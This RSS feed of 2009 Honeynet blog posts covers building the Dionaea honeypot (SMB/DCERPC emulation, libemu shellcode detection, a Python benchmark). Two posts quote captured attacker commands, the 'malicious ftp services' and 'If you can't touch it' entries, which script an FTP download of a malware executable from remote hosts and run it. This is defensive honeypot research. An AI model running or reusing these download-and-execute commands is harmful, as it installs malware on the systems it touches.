<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://honeynet.org" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</title>
 <link>http://honeynet.org/gsoc/project10</link>
 <description>Develop and Improve the effectiveness of low Interaction Honeypots</description>
 <language>en</language>
<item>
 <title>Iteolih: RPC vulnerability implementation party</title>
 <link>http://honeynet.org/node/488</link>
 <description>&lt;p&gt;The &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://dionaea.carnivore.it/&quot;&gt;Dionaea&lt;/a&gt; honeypot got more and more mature during the last weeks. As Markus blogged in &lt;a title=&quot;Markus&amp;#039; blog&quot; href=&quot;https://www.honeynet.org/node/485&quot;&gt;Iteolih: Miles and More&lt;/a&gt; the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.&lt;/p&gt;
&lt;p&gt;The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/488&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/107">Iteolih Samba DCERPC Python libemu</category>
 <pubDate>Tue, 25 Aug 2009 11:33:00 -0500</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">488 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Miles and More</title>
 <link>http://honeynet.org/node/485</link>
 <description>&lt;p&gt;We got a new milestone due:&lt;br /&gt;
&lt;strong&gt;10.08.2009&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;thread-pool works&lt;/li&gt;
&lt;li&gt;stream recording works&lt;/li&gt;
&lt;li&gt;shellcode detection using libemu works&lt;/li&gt;
&lt;li&gt;shellcode emulation using libemu works&lt;/li&gt;
&lt;li&gt;compiles on linux&amp;amp;openbsd&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An exploit taken from a public repository, run against the software, is detected and emulated.&lt;br /&gt;
To shorten things, basically all required points are hit with current svn.&lt;br /&gt;
So, given the time we just saved, some words about how it works.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/485&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Tue, 11 Aug 2009 07:10:33 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">485 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: malicious ftp services</title>
 <link>http://honeynet.org/node/470</link>
 <description>&lt;p&gt;Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WinExec(&quot;cmd /c echo open 78.1.96.200 4871 &amp;gt; o&amp;amp;echo user 1 1 &amp;gt;&amp;gt; o &amp;amp;echo get msq16.exe &amp;gt;&amp;gt; o&quot;)&lt;br /&gt;
ExitThread(0)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/470&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Sun, 26 Jul 2009 08:28:13 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">470 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: If you can&#039;t touch it ...</title>
 <link>http://honeynet.org/node/466</link>
 <description>&lt;p&gt;While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.&lt;/p&gt;
&lt;div class=&quot;geshifilter&quot;&gt;
&lt;div class=&quot;text geshifilter-text&quot; style=&quot;font-family:monospace;&quot;&gt;cmd /c echo open v1.usbupdatestrings.at 4356 &amp;gt; i&amp;amp;echo user ik ik &amp;gt;&amp;gt; i &amp;amp;echo binary &amp;gt;&amp;gt; i &amp;amp;echo get Ms07.exe &amp;gt;&amp;gt; i &amp;amp;echo quit &amp;gt;&amp;gt; i &amp;amp;ftp -n -s:i &amp;amp;Ms07.exe&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/466&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/93">ftp</category>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Tue, 21 Jul 2009 08:17:48 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">466 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: SMB/RPC efforts</title>
 <link>http://honeynet.org/node/463</link>
 <description>&lt;p&gt;During the last weeks I have been working on SMB and specifically DCERPC support for the &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://dionaea.carnivore.it/&quot;&gt;Dionaea&lt;/a&gt; next generation low-interaction honeypot (buzz!).&lt;/p&gt;
&lt;p&gt;SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The &lt;a href=&quot;http://www.snia.org/tech_activities/CIFS/&quot;&gt;CIFS technical reference&lt;/a&gt; and the &lt;a href=&quot;http://ubiqx.org/cifs/&quot;&gt;Implementing CIFS&lt;/a&gt; book have been constant companions for me since the beginning of the project.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/463&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/92">Iteolih Samba DCERPC Python</category>
 <pubDate>Sat, 11 Jul 2009 10:23:49 -0500</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">463 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Is this worth your time?</title>
 <link>http://honeynet.org/node/437</link>
 <description>&lt;p&gt;Hello,&lt;br /&gt;
due to the length of the whole term &lt;em&gt;Improving the effectiveness of low interaction honeypots&lt;/em&gt;&lt;strong&gt;,&lt;/strong&gt; I decided to use &lt;strong&gt;Iteolih&lt;/strong&gt; as uniq abbrevitation. Things are rolling for the project, writing &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://svn.carnivore.it/browser/dionaea/trunk&quot;&gt;code&lt;/a&gt; started, a basic &lt;a href=&quot;http://dionaea.carnivore.it/&quot;&gt;homepage&lt;/a&gt; with instructions how to compile/use it was created.&lt;br /&gt;
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/437&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Fri, 05 Jun 2009 17:37:36 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">437 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Python Benchmark</title>
 <link>http://honeynet.org/node/426</link>
 <description>&lt;p&gt;As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The &#039;testsuite&#039; is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.&lt;br /&gt;
I tested &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)&lt;/li&gt;
&lt;li&gt;3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_&lt;/li&gt;
&lt;li&gt;3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To benchmark, I ran the apache benchmark tool &lt;strong&gt;ab&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/426&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <category domain="http://honeynet.org/taxonomy/term/56">python</category>
 <pubDate>Sun, 24 May 2009 11:57:02 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">426 at http://honeynet.org</guid>
</item>
</channel>
</rss>
